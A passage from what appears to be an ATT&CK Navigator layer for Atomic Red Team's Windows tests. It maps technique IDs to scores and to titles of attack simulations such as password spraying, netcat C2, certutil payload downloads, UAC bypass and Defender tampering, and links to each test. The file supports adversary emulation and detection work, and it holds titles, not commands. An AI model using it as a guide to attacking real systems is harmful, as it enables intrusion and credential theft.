Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE 
Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- 
certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- 
Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - 
PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence 
(HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload 
Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - 
Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT 
Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View 
